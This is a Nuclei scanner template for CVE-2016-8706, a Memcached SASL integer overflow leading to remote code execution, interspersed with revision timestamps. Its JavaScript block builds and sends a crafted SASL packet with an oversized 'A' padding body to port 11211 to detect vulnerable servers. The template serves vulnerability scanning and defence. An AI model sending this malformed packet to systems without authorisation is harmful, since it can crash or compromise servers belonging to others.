2023-10-30 08:06:00 +00:00
id : CVE-2016-8706
2023-11-13 10:33:23 +00:00
2023-10-30 08:06:00 +00:00
info :
2023-11-14 05:53:08 +00:00
name : Memcached Server SASL Authentication - Remote Code Execution
2023-10-30 08:06:00 +00:00
author : pussycat0x
severity : high
2023-11-13 10:33:23 +00:00
description : |
2023-11-20 06:35:10 +00:00
An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
2023-10-30 08:06:00 +00:00
reference :
- https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
- https://nvd.nist.gov/vuln/detail/CVE-2016-8706
2023-11-20 06:35:10 +00:00
- http://rhn.redhat.com/errata/RHSA-2016-2819.html
- http://www.debian.org/security/2016/dsa-3704
- http://www.securitytracker.com/id/1037333
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.1
cve-id : CVE-2016-8706
cwe-id : CWE-190
2023-12-12 11:07:52 +00:00
epss-score : 0.91612
epss-percentile : 0.9865
2023-11-20 06:35:10 +00:00
cpe : cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
2023-10-30 08:06:00 +00:00
metadata :
2023-11-20 06:35:10 +00:00
max-request : 1
vendor : memcached
product : memcached
2023-11-13 10:33:23 +00:00
verfied : true
2023-10-30 08:06:00 +00:00
tags : cve,cve2016,rce,js,memcached
javascript :
- code : |
let packet = bytes.NewBuffer();
packet.Write(new Uint8Array([0x80, 0x21]))
let cmd = 'stats'
packet.WriteString(cmd)
packet.Pack("!H", [32]);
packet.Pack("!I", [1]);
let buzz = Array(1000).fill("A").join('');
packet.WriteString(buzz)
const c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.SendHex(packet.Hex());
conn.RecvString();
args :
Host : "{{Host}}"
Port : 11211
matchers-condition : and
matchers :
- type : word
words :
- "Invalid arguments"
- type : word
words :
- "Auth failure"
negative : true
2023-12-12 12:02:03 +00:00
# digest: 490a004630440220679c0fed3309ef12d46db2927b7aa6d9934c5b2ce37560aa32edd8145bcb3176022019a2e1bc0a2ffec8ad9b0f617f906a74d520ea7dd8c53dccebc8ab03a57549dc:922c64590222798bb761d5b6d8e72950